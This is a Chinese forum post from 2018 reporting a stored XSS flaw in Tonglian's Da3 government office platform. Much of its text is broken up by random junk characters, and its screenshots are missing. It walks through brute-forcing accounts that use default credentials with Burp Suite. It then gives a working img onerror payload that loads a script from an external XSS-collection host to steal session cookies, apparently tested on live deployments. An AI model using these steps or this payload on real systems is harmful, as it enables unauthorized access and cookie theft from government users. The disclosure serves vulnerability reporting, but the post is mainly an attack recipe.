* b% B7 E- {: I. L* C8 P
8 S! {" ~) ]8 V2 g" n; j 同联Da3协同办公平台后台通用储存型xss漏洞
- o9 J. q4 \7 W& `3 x7 b3 ^; G
0 p# Q" S: t$ ~. X- r
8 K: X% G7 f, |5 ~; Y# o 平台简介:& e7 A* e* _6 v6 E3 @7 A
& q+ G5 F% a) e# h8 ]
) _+ S0 r, |; a, \( n- b2 U2 D9 r
G7 a2 A5 x+ a8 B) q
9 z9 ^3 G, h: ~* B' a
0 w k5 J0 d' Z& F4 t- v
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) _0 w: ]; u& J同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
v$ j% x8 Y: M1 t' W4 j9 c
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!1 o! l; T8 s+ {
* g( S& E; _9 \, Z1 v) k
1 i$ |/ S1 l2 t# o O( M9 D/ j
" t2 [- s1 H7 G, F8 g5 Y3 z
! l3 W2 Y2 z. d$ W9 I
2 H* g3 V, `4 _: h6 ^
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
' m% D# S6 Z6 [! t- `
. w, Z& {" ~1 K' n( n) v I: u ! S; D6 \1 i" U
3 E6 M( ~$ u& m
" _9 }1 J }. P! Z7 Z7 ?
0 M' Q8 f1 _3 B& I% s. Y. _ http://1.1.1.1:7197/cap-aco/#(案例2-)
1 k& ?% h9 O* y# Q) s
/ Y' K# A" D1 Y; ?5 k5 e" w
1 Q' \" d0 U/ L8 E http://www.XXOO.com (案例1-官网网站)" f6 L6 Z0 v& s& U& k
, v/ B; ]% ?4 y- H- @/ d1 x6 ?, O4 d
/ c$ @3 ?4 ^' b1 F- T. J+ f' u
漏洞详情:( R2 j9 `2 ?! q4 C. K' M
! u( }; Y6 b/ a
# i7 @3 M9 Y. _3 U& l' g
案例一、8 g+ h$ p" y& D+ L( @8 i* ?$ D; W8 D
. a1 V1 I$ e. j3 |( J8 k/ }
+ J6 p0 n9 V* }, r$ z 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试' i4 L- H& s' j; A
9 x: u6 |8 ~7 o& X1 U3 S1 e. a$ {, O
+ J7 _/ Z) P1 C! j, J q 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:# p5 U4 X$ w3 ^9 g5 A! }0 n2 o
+ O+ L7 J* n$ \ ( B% d# W* B& B ~% f7 {7 c; ?
; `. Q: |( w, c: \! I0 ^$ k2 r) n
: c$ C& M3 x0 `) i$ k
. ^$ M+ x( D- e; c z, Z 
6 U0 R5 ~6 C4 |8 y% Y) n" I- g" q
% S$ Z ^6 i w$ s+ S5 f
& o! T K* D, n. n V5 f
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: , ] n" E0 @2 |8 g9 {% a7 A
7 n: M, i/ i. C
6 V( V6 ^2 |) ?$ V* v- V
& S0 ]% J8 G; |, T+ S+ u
- K& P. _- H# V$ P- _( q 5 k q3 ~+ y% D% j, l$ Y- C
1 M, X$ E1 \+ x8 @$ i C/ e
3 U4 g7 o. ?: Q5 Y" N& E9 f
( a T* u" j! V3 @0 {/ ] 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ) c1 @3 i3 F# @+ h& ^& v
?8 [# Z6 q1 k- A/ ^
7 K7 q' f( y6 v8 N9 Z 0 x s0 @. v* t9 N
' T# _8 w* `* F; q& Y 3 h& |+ R* u+ }. ?' z
<img src=x
) ^) P+ @' S" \! yonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
& |; c" ]6 H7 s! d& V y6 s( q
2 ]% U7 h, o7 m+ Q
& x" D. Y' z0 v# B9 c 
$ |/ S& S( F- d% X7 h' L* M" X
4 o, P; t0 C7 _8 O
, |) U' S/ Z3 I
然后发送,接收cookie如图:
. s4 ~. O5 s/ m7 `0 F, C# O
1 m. K7 f1 V3 v
. P0 m% Y1 Q, M" V; ^
4 m7 |+ N9 [3 T$ k3 y! x7 B D
% \( w# H% H I$ V; J5 M
7 T) n& ~+ u6 B' D: L2 B
( w! \" L2 f4 f8 u* t$ z0 w
8 F$ y! s8 A" n9 U 7 E, _/ f, u3 S2 t# ^
% X0 D2 z+ G/ X0 G$ v
: R# N7 ^6 J, v5 s0 G; K9 S+ k3 ] 8 m$ n/ L* [* m' l' m6 ~
! I) b( X' O2 A7 R. V1 `. x
/ j4 F! h# [+ v4 A* i% P
" T" J' m, W5 ~' X5 I% Z& [, y Z 
, P* I- Z+ y* C. b
8 j$ ?7 |0 G+ R- R
6 V/ [9 i. _* |5 }$ S( z3 j$ v
o8 ]1 R9 G! L/ ?1 j# F
# x( K; z6 W, B$ U. h+ A. d
0 A. J* q8 W( X+ H
" c- E7 c7 c/ k+ l) ?" [
' d2 l- @- t2 i! a
% G2 T* T5 f( _+ Q3 I/ O 案例2、 6 ?, @# E& r% t+ ~" B' b& _
4 q, g: d- w, S9 J# t
" ]) Y' a" [6 s; D5 C2 U, c2 T( ?8 g0 r 前面步骤都一样,下面看效果图: % x# c( a8 {0 \
, n8 ?1 I: ?8 q: _' m
4 f) Y2 p, X, i2 P3 p& i* Z& O
5 Z; y7 A2 D! c2 j9 ~) L
( C; W: F o V0 x, y o
1 H" z" w$ F7 a. |5 A: l
, B) U7 g& x0 D! c; ?$ N. n; i
. B" I0 Y" L% I+ e0 Q0 { / ?. G& g! @7 P
' P0 n. n# f' D; ]/ z$ \) }) K
/ R+ I. `) f0 p6 b8 t3 |9 m9 s
" B& g; c; Y6 D
' w7 u2 g X' V
# A7 t# T3 ?' h0 P. P3 q ! `* j# l& T# A2 @
* T# s! N" {8 I
8 K0 B i2 k- x$ S$ d/ P
% [0 W1 y( R8 h6 M+ S3 L9 K' [
- p) f2 g. u! g0 E& o% c. r- Z
5 v; s' P$ f) _7 p D 3 h# E5 e' L1 Q# p# k
4 x: v' t6 [- }6 K
2 |( {9 B* J; I9 L0 I3 m 1 \' M/ \8 _6 P: K6 ]4 y
- H" t# Z& B7 s0 A
# h0 I8 v$ e( x2 r( ^+ h0 Z! i
% `" K+ Q5 q, x2 T% y9 ~/ [1 e1 K
" r9 `# G. q1 g
, K% h- r3 E1 M3 X0 T4 ^8 x
发表于 2018-10-20 20:14:15
收藏
支持
反对